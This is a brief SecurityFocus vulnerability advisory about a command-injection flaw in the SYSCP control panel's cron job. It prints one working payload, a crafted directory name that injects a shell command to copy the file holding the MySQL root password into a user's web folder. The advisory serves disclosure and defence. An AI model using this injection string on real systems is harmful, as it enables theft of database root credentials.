SYSCP System Control Panel CronJob Arbitrary Code Execution Vulnerability

Using the application to protect a directory with the following directory structure will result in the MySQL root password being copied to the user's home directory:

"; cp /var/www/syscp/lib/userdata.inc.php /var/[user]/webs/web1/; ls "


 

Privacy Statement
Copyright 2010, SecurityFocus